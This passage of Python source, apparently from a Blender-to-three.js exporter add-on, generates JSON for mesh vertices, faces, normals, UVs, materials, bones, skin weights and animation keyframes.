return [-cx,-cy,-cz]
def bottom(vertices):
"""Align bottom of the model with the floor (Y-axis) and center it around X and Z.
"""
bb = bbox(vertices)
cx = bb['x'][0] + (bb['x'][1] - bb['x'][0])/2.0
cy = bb['y'][0]
cz = bb['z'][0] + (bb['z'][1] - bb['z'][0])/2.0
translate(vertices, [-cx,-cy,-cz])
return [-cx,-cy,-cz]
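# align_model selects one of the helpers above: 1 -> center(), 2 -> bottom(), 3 -> top();
# each returns the applied offset so that morph-target frames can be shifted consistently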
# #####################################################
# Elements rendering
# #####################################################
def hexcolor(c):
return ( int(c[0] * 255) << 16 ) + ( int(c[1] * 255) << 8 ) + int(c[2] * 255)
def generate_vertices(vertices, option_vertices_truncate, option_vertices):
if not option_vertices:
return ""
return ",".join(generate_vertex(v, option_vertices_truncate) for v in vertices)
def generate_vertex(v, option_vertices_truncate):
if not option_vertices_truncate:
return TEMPLATE_VERTEX % (v.co.x, v.co.y, v.co.z)
else:
return TEMPLATE_VERTEX_TRUNCATE % (v.co.x, v.co.y, v.co.z)
def generate_normal(n):
return TEMPLATE_N % (n[0], n[1], n[2])
def generate_vertex_color(c):
return TEMPLATE_C % c
def generate_uv(uv):
return TEMPLATE_UV % (uv[0], uv[1])
# #####################################################
# Model exporter - faces
# #####################################################
def setBit(value, position, on):
if on:
mask = 1 << position
return (value | mask)
else:
mask = ~(1 << position)
return (value & mask)
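# e.g. setBit(0, 3, True) == 8 and setBit(0xff, 0, False) == 0xfe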
def generate_faces(normals, uv_layers, colors, meshes, option_normals, option_colors, option_uv_coords, option_materials, option_faces):
if not option_faces:
return "", 0
vertex_offset = 0
material_offset = 0
chunks = []
for mesh, object in meshes:
vertexUV = len(mesh.uv_textures) > 0
vertexColors = len(mesh.vertex_colors) > 0
mesh_colors = option_colors and vertexColors
mesh_uvs = option_uv_coords and vertexUV
if vertexUV:
active_uv_layer = mesh.uv_textures.active
if not active_uv_layer:
                mesh_uvs = False
if vertexColors:
active_col_layer = mesh.vertex_colors.active
if not active_col_layer:
mesh_extract_colors = False
for i, f in enumerate(get_faces(mesh)):
face = generate_face(f, i, normals, uv_layers, colors, mesh, option_normals, mesh_colors, mesh_uvs, option_materials, vertex_offset, material_offset)
chunks.append(face)
vertex_offset += len(mesh.vertices)
material_count = len(mesh.materials)
if material_count == 0:
material_count = 1
material_offset += material_count
return ",".join(chunks), len(chunks)
def generate_face(f, faceIndex, normals, uv_layers, colors, mesh, option_normals, option_colors, option_uv_coords, option_materials, vertex_offset, material_offset):
isTriangle = ( len(f.vertices) == 3 )
if isTriangle:
nVertices = 3
else:
nVertices = 4
hasMaterial = option_materials
hasFaceUvs = False # not supported in Blender
hasFaceVertexUvs = option_uv_coords
hasFaceNormals = False # don't export any face normals (as they are computed in engine)
hasFaceVertexNormals = option_normals
hasFaceColors = False # not supported in Blender
hasFaceVertexColors = option_colors
faceType = 0
faceType = setBit(faceType, 0, not isTriangle)
faceType = setBit(faceType, 1, hasMaterial)
faceType = setBit(faceType, 2, hasFaceUvs)
faceType = setBit(faceType, 3, hasFaceVertexUvs)
faceType = setBit(faceType, 4, hasFaceNormals)
faceType = setBit(faceType, 5, hasFaceVertexNormals)
faceType = setBit(faceType, 6, hasFaceColors)
faceType = setBit(faceType, 7, hasFaceVertexColors)
faceData = []
# order is important, must match order in JSONLoader
# face type
# vertex indices
# material index
# face uvs index
# face vertex uvs indices
# face color index
# face vertex colors indices
faceData.append(faceType)
# must clamp in case on polygons bigger than quads
for i in range(nVertices):
index = f.vertices[i] + vertex_offset
faceData.append(index)
if hasMaterial:
index = f.material_index + material_offset
faceData.append( index )
if hasFaceVertexUvs:
for layer_index, uvs in enumerate(uv_layers):
uv = get_uv_indices(faceIndex, uvs, mesh, layer_index)
for i in range(nVertices):
index = uv[i]
faceData.append(index)
if hasFaceVertexNormals:
n = get_normal_indices(f.vertices, normals, mesh)
for i in range(nVertices):
index = n[i]
faceData.append(index)
if hasFaceVertexColors:
c = get_color_indices(faceIndex, colors, mesh)
for i in range(nVertices):
index = c[i]
faceData.append(index)
return ",".join( map(str, faceData) )
# #####################################################
# Model exporter - normals
# #####################################################
def extract_vertex_normals(mesh, normals, count):
for f in get_faces(mesh):
for v in f.vertices:
normal = mesh.vertices[v].normal
key = veckey3d(normal)
if key not in normals:
normals[key] = count
count += 1
return count
def generate_normals(normals, option_normals):
if not option_normals:
return ""
chunks = []
for key, index in sorted(normals.items(), key = operator.itemgetter(1)):
chunks.append(key)
return ",".join(generate_normal(n) for n in chunks)
# #####################################################
# Model exporter - vertex colors
# #####################################################
def extract_vertex_colors(mesh, colors, count):
color_layer = mesh.tessface_vertex_colors.active.data
for face_index, face in enumerate(get_faces(mesh)):
face_colors = color_layer[face_index]
face_colors = face_colors.color1, face_colors.color2, face_colors.color3, face_colors.color4
for c in face_colors:
key = hexcolor(c)
if key not in colors:
colors[key] = count
count += 1
return count
def generate_vertex_colors(colors, option_colors):
if not option_colors:
return ""
chunks = []
for key, index in sorted(colors.items(), key=operator.itemgetter(1)):
chunks.append(key)
return ",".join(generate_vertex_color(c) for c in chunks)
# #####################################################
# Model exporter - UVs
# #####################################################
def extract_uvs(mesh, uv_layers, counts):
for index, layer in enumerate(mesh.tessface_uv_textures):
if len(uv_layers) <= index:
uvs = {}
count = 0
uv_layers.append(uvs)
counts.append(count)
else:
uvs = uv_layers[index]
count = counts[index]
uv_layer = layer.data
for face_index, face in enumerate(get_faces(mesh)):
for uv_index, uv in enumerate(uv_layer[face_index].uv):
key = veckey2d(uv)
if key not in uvs:
uvs[key] = count
count += 1
counts[index] = count
return counts
def generate_uvs(uv_layers, option_uv_coords):
if not option_uv_coords:
return "[]"
layers = []
for uvs in uv_layers:
chunks = []
for key, index in sorted(uvs.items(), key=operator.itemgetter(1)):
chunks.append(key)
layer = ",".join(generate_uv(n) for n in chunks)
layers.append(layer)
return ",".join("[%s]" % n for n in layers)
# ##############################################################################
# Model exporter - armature
# (only the first armature will exported)
# ##############################################################################
def get_armature():
if len(bpy.data.armatures) == 0:
print("Warning: no armatures in the scene")
return None, None
armature = bpy.data.armatures[0]
# Someone please figure out a proper way to get the armature node
for object in bpy.data.objects:
if object.type == 'ARMATURE':
return armature, object
print("Warning: no node of type 'ARMATURE' in the scene")
return None, None
# ##############################################################################
# Model exporter - bones
# (only the first armature will exported)
# ##############################################################################
def generate_bones(meshes, option_bones, flipyz):
if not option_bones:
return "", 0
armature, armature_object = get_armature()
if armature_object is None:
return "", 0
hierarchy = []
armature_matrix = armature_object.matrix_world
pose_bones = armature_object.pose.bones
#pose_bones = armature.bones
TEMPLATE_BONE = '{"parent":%d,"name":"%s","pos":[%g,%g,%g],"rotq":[%g,%g,%g,%g],"scl":[%g,%g,%g]}'
for pose_bone in pose_bones:
armature_bone = pose_bone.bone
#armature_bone = pose_bone
bonePos = armature_matrix * armature_bone.head_local
boneIndex = None
if armature_bone.parent is None:
bone_matrix = armature_matrix * armature_bone.matrix_local
bone_index = -1
else:
parent_matrix = armature_matrix * armature_bone.parent.matrix_local
bone_matrix = armature_matrix * armature_bone.matrix_local
bone_matrix = parent_matrix.inverted() * bone_matrix
bone_index = i = 0
for pose_parent in pose_bones:
armature_parent = pose_parent.bone
#armature_parent = pose_parent
if armature_parent.name == armature_bone.parent.name:
bone_index = i
i += 1
pos, rot, scl = bone_matrix.decompose()
if flipyz:
joint = TEMPLATE_BONE % (bone_index, armature_bone.name, pos.x, pos.z, -pos.y, rot.x, rot.z, -rot.y, rot.w, scl.x, scl.z, scl.y)
hierarchy.append(joint)
else:
joint = TEMPLATE_BONE % (bone_index, armature_bone.name, pos.x, pos.y, pos.z, rot.x, rot.y, rot.z, rot.w, scl.x, scl.y, scl.z)
hierarchy.append(joint)
bones_string = ",".join(hierarchy)
return bones_string, len(pose_bones)
# ##############################################################################
# Model exporter - skin indices and weights
# ##############################################################################
def generate_indices_and_weights(meshes, option_skinning):
if not option_skinning or len(bpy.data.armatures) == 0:
return "", ""
indices = []
weights = []
armature, armature_object = get_armature()
for mesh, object in meshes:
i = 0
mesh_index = -1
# find the original object
for obj in bpy.data.objects:
if obj.name == mesh.name or obj == object:
mesh_index = i
i += 1
if mesh_index == -1:
print("generate_indices: couldn't find object for mesh", mesh.name)
continue
object = bpy.data.objects[mesh_index]
for vertex in mesh.vertices:
# sort bones by influence
bone_array = []
for group in vertex.groups:
index = group.group
weight = group.weight
bone_array.append( (index, weight) )
bone_array.sort(key = operator.itemgetter(1), reverse=True)
# select first N bones
for i in range(MAX_INFLUENCES):
if i < len(bone_array):
bone_proxy = bone_array[i]
found = 0
index = bone_proxy[0]
weight = bone_proxy[1]
for j, bone in enumerate(armature_object.pose.bones):
if object.vertex_groups[index].name == bone.name:
indices.append('%d' % j)
weights.append('%g' % weight)
found = 1
break
if found != 1:
indices.append('0')
weights.append('0')
else:
indices.append('0')
weights.append('0')
indices_string = ",".join(indices)
weights_string = ",".join(weights)
return indices_string, weights_string
# ##############################################################################
# Model exporter - skeletal animation
# (only the first action will exported)
# ##############################################################################
def generate_animation(option_animation_skeletal, option_frame_step, flipyz, option_frame_index_as_time, index):
if not option_animation_skeletal or len(bpy.data.actions) == 0:
return ""
# TODO: Add scaling influences
action = bpy.data.actions[index]
# get current context and then switch to dopesheet temporarily
current_context = bpy.context.area.type
bpy.context.area.type = "DOPESHEET_EDITOR"
bpy.context.space_data.mode = "ACTION"
# set active action
bpy.context.area.spaces.active.action = action
armature, armature_object = get_armature()
if armature_object is None or armature is None:
return "", 0
#armature_object = bpy.data.objects['marine_rig']
armature_matrix = armature_object.matrix_world
fps = bpy.data.scenes[0].render.fps
end_frame = action.frame_range[1]
start_frame = action.frame_range[0]
frame_length = end_frame - start_frame
used_frames = int(frame_length / option_frame_step) + 1
TEMPLATE_KEYFRAME_FULL = '{"time":%g,"pos":[%g,%g,%g],"rot":[%g,%g,%g,%g],"scl":[%g,%g,%g]}'
TEMPLATE_KEYFRAME_BEGIN = '{"time":%g'
TEMPLATE_KEYFRAME_END = '}'
TEMPLATE_KEYFRAME_POS = ',"pos":[%g,%g,%g]'
TEMPLATE_KEYFRAME_ROT = ',"rot":[%g,%g,%g,%g]'
TEMPLATE_KEYFRAME_SCL = ',"scl":[%g,%g,%g]'
keys = []
channels_location = []
channels_rotation = []
channels_scale = []
# Precompute per-bone data
for pose_bone in armature_object.pose.bones:
armature_bone = pose_bone.bone
keys.append([])
channels_location.append( find_channels(action, armature_bone, "location"))
        # keep a single combined rotation-channel entry per bone so that indexing by
        # bone_index below stays aligned with keys/channels_location/channels_scale
        channels_rotation.append( find_channels(action, armature_bone, "rotation_quaternion")
                                  + find_channels(action, armature_bone, "rotation_euler"))
channels_scale.append( find_channels(action, armature_bone, "scale"))
# Process all frames
for frame_i in range(0, used_frames):
#print("Processing frame %d/%d" % (frame_i, used_frames))
# Compute the index of the current frame (snap the last index to the end)
frame = start_frame + frame_i * option_frame_step
if frame_i == used_frames-1:
frame = end_frame
# Compute the time of the frame
if option_frame_index_as_time:
time = frame - start_frame
else:
time = (frame - start_frame) / fps
# Let blender compute the pose bone transformations
bpy.data.scenes[0].frame_set(frame)
# Process all bones for the current frame
bone_index = 0
for pose_bone in armature_object.pose.bones:
# Extract the bone transformations
if pose_bone.parent is None:
bone_matrix = armature_matrix * pose_bone.matrix
else:
parent_matrix = armature_matrix * pose_bone.parent.matrix
bone_matrix = armature_matrix * pose_bone.matrix
bone_matrix = parent_matrix.inverted() * bone_matrix
pos, rot, scl = bone_matrix.decompose()
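            # NOTE: the "True or ..." checks below are effectively disabled, so a full
            # keyframe is emitted for every bone at every sampled frame.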
pchange = True or has_keyframe_at(channels_location[bone_index], frame)
rchange = True or has_keyframe_at(channels_rotation[bone_index], frame)
schange = True or has_keyframe_at(channels_scale[bone_index], frame)
if flipyz:
px, py, pz = pos.x, pos.z, -pos.y
rx, ry, rz, rw = rot.x, rot.z, -rot.y, rot.w
sx, sy, sz = scl.x, scl.z, scl.y
else:
px, py, pz = pos.x, pos.y, pos.z
rx, ry, rz, rw = rot.x, rot.y, rot.z, rot.w
sx, sy, sz = scl.x, scl.y, scl.z
# START-FRAME: needs pos, rot and scl attributes (required frame)
if frame == start_frame:
keyframe = TEMPLATE_KEYFRAME_FULL % (time, px, py, pz, rx, ry, rz, rw, sx, sy, sz)
keys[bone_index].append(keyframe)
# END-FRAME: needs pos, rot and scl attributes with animation length (required frame)
elif frame == end_frame:
keyframe = TEMPLATE_KEYFRAME_FULL % (time, px, py, pz, rx, ry, rz, rw, sx, sy, sz)
keys[bone_index].append(keyframe)
# MIDDLE-FRAME: needs only one of the attributes, can be an empty frame (optional frame)
elif pchange == True or rchange == True:
keyframe = TEMPLATE_KEYFRAME_BEGIN % time
if pchange == True:
keyframe = keyframe + TEMPLATE_KEYFRAME_POS % (px, py, pz)
if rchange == True:
keyframe = keyframe + TEMPLATE_KEYFRAME_ROT % (rx, ry, rz, rw)
if schange == True:
keyframe = keyframe + TEMPLATE_KEYFRAME_SCL % (sx, sy, sz)
keyframe = keyframe + TEMPLATE_KEYFRAME_END
keys[bone_index].append(keyframe)
bone_index += 1
# Gather data
parents = []
bone_index = 0
for pose_bone in armature_object.pose.bones:
keys_string = ",".join(keys[bone_index])
parent_index = bone_index - 1 # WTF? Also, this property is not used by three.js
parent = '{"parent":%d,"keys":[%s]}' % (parent_index, keys_string)
bone_index += 1
parents.append(parent)
hierarchy_string = ",".join(parents)
if option_frame_index_as_time:
length = frame_length
else:
length = frame_length / fps
animation_string = '"name":"%s","fps":%d,"length":%g,"hierarchy":[%s]' % (action.name, fps, length, hierarchy_string)
bpy.data.scenes[0].frame_set(start_frame)
# reset context
bpy.context.area.type = current_context
return animation_string
def find_channels(action, bone, channel_type):
bone_name = bone.name
ngroups = len(action.groups)
result = []
# Variant 1: channels grouped by bone names
if ngroups > 0:
# Find the channel group for the given bone
group_index = -1
for i in range(ngroups):
if action.groups[i].name == bone_name:
group_index = i
# Get all desired channels in that group
if group_index > -1:
for channel in action.groups[group_index].channels:
if channel_type in channel.data_path:
result.append(channel)
# Variant 2: no channel groups, bone names included in channel names
else:
bone_label = '"%s"' % bone_name
for channel in action.fcurves:
data_path = channel.data_path
if bone_label in data_path and channel_type in data_path:
result.append(channel)
return result
def find_keyframe_at(channel, frame):
for keyframe in channel.keyframe_points:
if keyframe.co[0] == frame:
return keyframe
return None
def has_keyframe_at(channels, frame):
for channel in channels:
if not find_keyframe_at(channel, frame) is None:
return True
return False
def generate_all_animations(option_animation_skeletal, option_frame_step, flipyz, option_frame_index_as_time):
all_animations_string = ""
if option_animation_skeletal:
for index in range(0, len(bpy.data.actions)):
if index != 0 :
all_animations_string += ", \n"
all_animations_string += "{" + generate_animation(option_animation_skeletal, option_frame_step, flipyz, option_frame_index_as_time,index) + "}"
return all_animations_string
def handle_position_channel(channel, frame, position):
change = False
if channel.array_index in [0, 1, 2]:
for keyframe in channel.keyframe_points:
if keyframe.co[0] == frame:
change = True
value = channel.evaluate(frame)
if channel.array_index == 0:
position.x = value
if channel.array_index == 1:
position.y = value
if channel.array_index == 2:
position.z = value
return change
def position(bone, frame, action, armatureMatrix):
position = mathutils.Vector((0,0,0))
change = False
ngroups = len(action.groups)
if ngroups > 0:
index = 0
for i in range(ngroups):
if action.groups[i].name == bone.name:
index = i
for channel in action.groups[index].channels:
if "location" in channel.data_path:
hasChanged = handle_position_channel(channel, frame, position)
change = change or hasChanged
else:
bone_label = '"%s"' % bone.name
for channel in action.fcurves:
data_path = channel.data_path
if bone_label in data_path and "location" in data_path:
hasChanged = handle_position_channel(channel, frame, position)
change = change or hasChanged
position = position * bone.matrix_local.inverted()
if bone.parent == None:
position.x += bone.head.x
position.y += bone.head.y
position.z += bone.head.z
else:
parent = bone.parent
parentInvertedLocalMatrix = parent.matrix_local.inverted()
parentHeadTailDiff = parent.tail_local - parent.head_local
position.x += (bone.head * parentInvertedLocalMatrix).x + parentHeadTailDiff.x
position.y += (bone.head * parentInvertedLocalMatrix).y + parentHeadTailDiff.y
position.z += (bone.head * parentInvertedLocalMatrix).z + parentHeadTailDiff.z
return armatureMatrix*position, change
def handle_rotation_channel(channel, frame, rotation):
change = False
if channel.array_index in [0, 1, 2, 3]:
for keyframe in channel.keyframe_points:
if keyframe.co[0] == frame:
change = True
value = channel.evaluate(frame)
if channel.array_index == 1:
rotation.x = value
elif channel.array_index == 2:
rotation.y = value
elif channel.array_index == 3:
rotation.z = value
elif channel.array_index == 0:
rotation.w = value
return change
def rotation(bone, frame, action, armatureMatrix):
# TODO: calculate rotation also from rotation_euler channels
rotation = mathutils.Vector((0,0,0,1))
change = False
ngroups = len(action.groups)
# animation grouped by bones
if ngroups > 0:
index = -1
for i in range(ngroups):
if action.groups[i].name == bone.name:
index = i
if index > -1:
for channel in action.groups[index].channels:
if "quaternion" in channel.data_path:
hasChanged = handle_rotation_channel(channel, frame, rotation)
change = change or hasChanged
# animation in raw fcurves
else:
bone_label = '"%s"' % bone.name
for channel in action.fcurves:
data_path = channel.data_path
if bone_label in data_path and "quaternion" in data_path:
hasChanged = handle_rotation_channel(channel, frame, rotation)
change = change or hasChanged
rot3 = rotation.to_3d()
rotation.xyz = rot3 * bone.matrix_local.inverted()
rotation.xyz = armatureMatrix * rotation.xyz
return rotation, change
# #####################################################
# Model exporter - materials
# #####################################################
def generate_color(i):
"""Generate hex color corresponding to integer.
Colors should have well defined ordering.
First N colors are hardcoded, then colors are random
(must seed random number generator with deterministic value
before getting colors).
"""
if i < len(COLORS):
#return "0x%06x" % COLORS[i]
return COLORS[i]
else:
#return "0x%06x" % int(0xffffff * random.random())
return int(0xffffff * random.random())
def generate_mtl(materials):
"""Generate dummy materials.
"""
mtl = {}
for m in materials:
index = materials[m]
mtl[m] = {
"DbgName": m,
"DbgIndex": index,
"DbgColor": generate_color(index),
"vertexColors" : False
}
return mtl
def value2string(v):
if type(v) == str and v[0:2] != "0x":
return '"%s"' % v
elif type(v) == bool:
return str(v).lower()
elif type(v) == list:
return "[%s]" % (", ".join(value2string(x) for x in v))
return str(v)
def generate_materials(mtl, materials, draw_type):
"""Generate JS array of materials objects
"""
mtl_array = []
for m in mtl:
index = materials[m]
# add debug information
# materials should be sorted according to how
# they appeared in OBJ file (for the first time)
# this index is identifier used in face definitions
mtl[m]['DbgName'] = m
mtl[m]['DbgIndex'] = index
mtl[m]['DbgColor'] = generate_color(index)
if draw_type in [ "BOUNDS", "WIRE" ]:
mtl[m]['wireframe'] = True
mtl[m]['DbgColor'] = 0xff0000
mtl_raw = ",\n".join(['\t\t"%s" : %s' % (n, value2string(v)) for n,v in sorted(mtl[m].items())])
mtl_string = "\t{\n%s\n\t}" % mtl_raw
mtl_array.append([index, mtl_string])
return ",\n\n".join([m for i,m in sorted(mtl_array)]), len(mtl_array)
def extract_materials(mesh, scene, option_colors, option_copy_textures, filepath):
world = scene.world
materials = {}
for m in mesh.materials:
if m:
materials[m.name] = {}
material = materials[m.name]
material['colorDiffuse'] = [m.diffuse_intensity * m.diffuse_color[0],
m.diffuse_intensity * m.diffuse_color[1],
m.diffuse_intensity * m.diffuse_color[2]]
material['colorSpecular'] = [m.specular_intensity * m.specular_color[0],
m.specular_intensity * m.specular_color[1],
m.specular_intensity * m.specular_color[2]]
material['colorAmbient'] = [m.ambient * material['colorDiffuse'][0],
m.ambient * material['colorDiffuse'][1],
m.ambient * material['colorDiffuse'][2]]
material['colorEmissive'] = [m.emit * material['colorDiffuse'][0],
m.emit * material['colorDiffuse'][1],
m.emit * material['colorDiffuse'][2]]
material['transparency'] = m.alpha
# not sure about mapping values to Blinn-Phong shader
# Blender uses INT from [1, 511] with default 0
# http://www.blender.org/documentation/blender_python_api_2_54_0/bpy.types.Material.html#bpy.types.Material.specular_hardness
material["specularCoef"] = m.specular_hardness
textures = guess_material_textures(m)
handle_texture('diffuse', textures, material, filepath, option_copy_textures)
handle_texture('light', textures, material, filepath, option_copy_textures)
handle_texture('normal', textures, material, filepath, option_copy_textures)
handle_texture('specular', textures, material, filepath, option_copy_textures)
handle_texture('bump', textures, material, filepath, option_copy_textures)
material["vertexColors"] = m.THREE_useVertexColors and option_colors
# can't really use this reliably to tell apart Phong from Lambert
# as Blender defaults to non-zero specular color
#if m.specular_intensity > 0.0 and (m.specular_color[0] > 0 or m.specular_color[1] > 0 or m.specular_color[2] > 0):
# material['shading'] = "Phong"
#else:
# material['shading'] = "Lambert"
if textures['normal']:
material['shading'] = "Phong"
else:
material['shading'] = m.THREE_materialType
material['blending'] = m.THREE_blendingType
material['depthWrite'] = m.THREE_depthWrite
material['depthTest'] = m.THREE_depthTest
material['transparent'] = m.use_transparency
return materials
def generate_materials_string(mesh, scene, option_colors, draw_type, option_copy_textures, filepath, offset):
random.seed(42) # to get well defined color order for debug materials
materials = {}
if mesh.materials:
for i, m in enumerate(mesh.materials):
mat_id = i + offset
if m:
materials[m.name] = mat_id
else:
materials["undefined_dummy_%0d" % mat_id] = mat_id
if not materials:
materials = { 'default': 0 }
# default dummy materials
mtl = generate_mtl(materials)
# extract real materials from the mesh
mtl.update(extract_materials(mesh, scene, option_colors, option_copy_textures, filepath))
return generate_materials(mtl, materials, draw_type)
def handle_texture(id, textures, material, filepath, option_copy_textures):
if textures[id] and textures[id]['texture'].users > 0 and len(textures[id]['texture'].users_material) > 0:
texName = 'map%s' % id.capitalize()
repeatName = 'map%sRepeat' % id.capitalize()
wrapName = 'map%sWrap' % id.capitalize()
slot = textures[id]['slot']
texture = textures[id]['texture']
image = texture.image
fname = extract_texture_filename(image)
material[texName] = fname
if option_copy_textures:
save_image(image, fname, filepath)
if texture.repeat_x != 1 or texture.repeat_y != 1:
material[repeatName] = [texture.repeat_x, texture.repeat_y]
if texture.extension == "REPEAT":
wrap_x = "repeat"
wrap_y = "repeat"
if texture.use_mirror_x:
wrap_x = "mirror"
if texture.use_mirror_y:
wrap_y = "mirror"
material[wrapName] = [wrap_x, wrap_y]
if slot.use_map_normal:
if slot.normal_factor != 1.0:
if id == "bump":
material['mapBumpScale'] = slot.normal_factor
else:
material['mapNormalFactor'] = slot.normal_factor
# #####################################################
# ASCII model generator
# #####################################################
def generate_ascii_model(meshes, morphs,
scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
option_copy_textures,
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step):
vertices = []
vertex_offset = 0
vertex_offsets = []
nnormal = 0
normals = {}
ncolor = 0
colors = {}
nuvs = []
uv_layers = []
nmaterial = 0
materials = []
for mesh, object in meshes:
vertexUV = len(mesh.uv_textures) > 0
vertexColors = len(mesh.vertex_colors) > 0
mesh_extract_colors = option_colors and vertexColors
mesh_extract_uvs = option_uv_coords and vertexUV
if vertexUV:
active_uv_layer = mesh.uv_textures.active
if not active_uv_layer:
mesh_extract_uvs = False
if vertexColors:
active_col_layer = mesh.vertex_colors.active
if not active_col_layer:
mesh_extract_colors = False
vertex_offsets.append(vertex_offset)
vertex_offset += len(vertices)
vertices.extend(mesh.vertices[:])
if option_normals:
nnormal = extract_vertex_normals(mesh, normals, nnormal)
if mesh_extract_colors:
ncolor = extract_vertex_colors(mesh, colors, ncolor)
if mesh_extract_uvs:
nuvs = extract_uvs(mesh, uv_layers, nuvs)
if option_materials:
mesh_materials, nmaterial = generate_materials_string(mesh, scene, mesh_extract_colors, object.draw_type, option_copy_textures, filepath, nmaterial)
materials.append(mesh_materials)
morphTargets_string = ""
nmorphTarget = 0
if option_animation_morph:
chunks = []
for i, morphVertices in enumerate(morphs):
morphTarget = '{ "name": "%s_%06d", "vertices": [%s] }' % ("animation", i, morphVertices)
chunks.append(morphTarget)
morphTargets_string = ",\n\t".join(chunks)
nmorphTarget = len(morphs)
if align_model == 1:
center(vertices)
elif align_model == 2:
bottom(vertices)
elif align_model == 3:
top(vertices)
faces_string, nfaces = generate_faces(normals, uv_layers, colors, meshes, option_normals, option_colors, option_uv_coords, option_materials, option_faces)
bones_string, nbone = generate_bones(meshes, option_bones, flipyz)
indices_string, weights_string = generate_indices_and_weights(meshes, option_skinning)
materials_string = ",\n\n".join(materials)
model_string = TEMPLATE_MODEL_ASCII % {
"scale" : option_scale,
"uvs" : generate_uvs(uv_layers, option_uv_coords),
"normals" : generate_normals(normals, option_normals),
"colors" : generate_vertex_colors(colors, option_colors),
"materials" : materials_string,
"vertices" : generate_vertices(vertices, option_vertices_truncate, option_vertices),
"faces" : faces_string,
"morphTargets" : morphTargets_string,
"bones" : bones_string,
"indices" : indices_string,
"weights" : weights_string,
"animations" : generate_all_animations(option_animation_skeletal, option_frame_step, flipyz, option_frame_index_as_time)
}
text = TEMPLATE_FILE_ASCII % {
"nvertex" : len(vertices),
"nface" : nfaces,
"nuvs" : ",".join("%d" % n for n in nuvs),
"nnormal" : nnormal,
"ncolor" : ncolor,
"nmaterial" : nmaterial,
"nmorphTarget": nmorphTarget,
"nbone" : nbone,
"model" : model_string
}
return text, model_string
# #####################################################
# Model exporter - export single mesh
# #####################################################
def extract_meshes(objects, scene, export_single_model, option_scale, flipyz):
meshes = []
for object in objects:
if object.type == "MESH" and object.THREE_exportGeometry:
# collapse modifiers into mesh
mesh = object.to_mesh(scene, True, 'RENDER')
if not mesh:
raise Exception("Error, could not get mesh data from object [%s]" % object.name)
# preserve original name
mesh.name = object.name
if export_single_model:
if flipyz:
# that's what Blender's native export_obj.py does to flip YZ
X_ROT = mathutils.Matrix.Rotation(-math.pi/2, 4, 'X')
mesh.transform(X_ROT * object.matrix_world)
else:
mesh.transform(object.matrix_world)
mesh.update(calc_tessface=True)
mesh.calc_normals()
mesh.calc_tessface()
mesh.transform(mathutils.Matrix.Scale(option_scale, 4))
meshes.append([mesh, object])
return meshes
def generate_mesh_string(objects, scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
export_single_model,
option_copy_textures,
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step):
meshes = extract_meshes(objects, scene, export_single_model, option_scale, flipyz)
morphs = []
if option_animation_morph:
original_frame = scene.frame_current # save animation state
scene_frames = range(scene.frame_start, scene.frame_end + 1, option_frame_step)
for index, frame in enumerate(scene_frames):
scene.frame_set(frame, 0.0)
anim_meshes = extract_meshes(objects, scene, export_single_model, option_scale, flipyz)
frame_vertices = []
for mesh, object in anim_meshes:
frame_vertices.extend(mesh.vertices[:])
if index == 0:
if align_model == 1:
offset = center(frame_vertices)
elif align_model == 2:
offset = bottom(frame_vertices)
elif align_model == 3:
offset = top(frame_vertices)
else:
offset = False
else:
if offset:
translate(frame_vertices, offset)
morphVertices = generate_vertices(frame_vertices, option_vertices_truncate, option_vertices)
morphs.append(morphVertices)
# remove temp meshes
for mesh, object in anim_meshes:
bpy.data.meshes.remove(mesh)
scene.frame_set(original_frame, 0.0) # restore animation state
text, model_string = generate_ascii_model(meshes, morphs,
scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
option_copy_textures,
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step)
# remove temp meshes
for mesh, object in meshes:
bpy.data.meshes.remove(mesh)
return text, model_string
def export_mesh(objects,
scene, filepath,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
export_single_model,
option_copy_textures,
option_animation_morph,
option_animation_skeletal,
option_frame_step,
option_frame_index_as_time):
"""Export single mesh"""
text, model_string = generate_mesh_string(objects,
scene,
option_vertices,
option_vertices_truncate,
option_faces,
option_normals,
option_uv_coords,
option_materials,
option_colors,
option_bones,
option_skinning,
align_model,
flipyz,
option_scale,
export_single_model,
option_copy_textures,
filepath,
option_animation_morph,
option_animation_skeletal,
option_frame_index_as_time,
option_frame_step)
write_file(filepath, text)
print("writing", filepath, "done")
# #####################################################
# Scene exporter - render elements
# #####################################################
def generate_quat(quat):
return TEMPLATE_VEC4 % (quat.x, quat.y, quat.z, quat.w)
def generate_vec4(vec):
return TEMPLATE_VEC4 % (vec[0], vec[1], vec[2], vec[3])
def generate_vec3(vec, flipyz = False):
if flipyz:
return TEMPLATE_VEC3 % (vec[0], vec[2], vec[1])
return TEMPLATE_VEC3 % (vec[0], vec[1], vec[2])
def generate_vec2(vec):
return TEMPLATE_VEC2 % (vec[0], vec[1])
def generate_hex(number):
return TEMPLATE_HEX % number
def generate_string(s):
return TEMPLATE_STRING % s
def generate_string_list(src_list):
return ", ".join(generate_string(item) for item in src_list)
def generate_section(label, content):
return TEMPLATE_SECTION % (label, content)
def get_mesh_filename(mesh):
object_id = mesh["data"]["name"]
filename = "%s.js" % sanitize(object_id)
return filename
def generate_material_id_list(materials):
chunks = []
for material in materials:
chunks.append(material.name)
return chunks
def generate_group_id_list(obj):
chunks = []
for group in bpy.data.groups:
if obj.name in group.objects:
chunks.append(group.name)
return chunks
def generate_bool_property(property):
if property:
return "true"
return "false"
# #####################################################
# Scene exporter - objects
# #####################################################
def generate_objects(data):
chunks = []
for obj in data["objects"]:
if obj.type == "MESH" and obj.THREE_exportGeometry:
object_id = obj.name
#if len(obj.modifiers) > 0:
# geo_name = obj.name
#else:
geo_name = obj.data.name
geometry_id = "geo_%s" % geo_name
material_ids = generate_material_id_list(obj.material_slots)
group_ids = generate_group_id_list(obj)
if data["flipyz"]:
matrix_world = ROTATE_X_PI2 * obj.matrix_world
else:
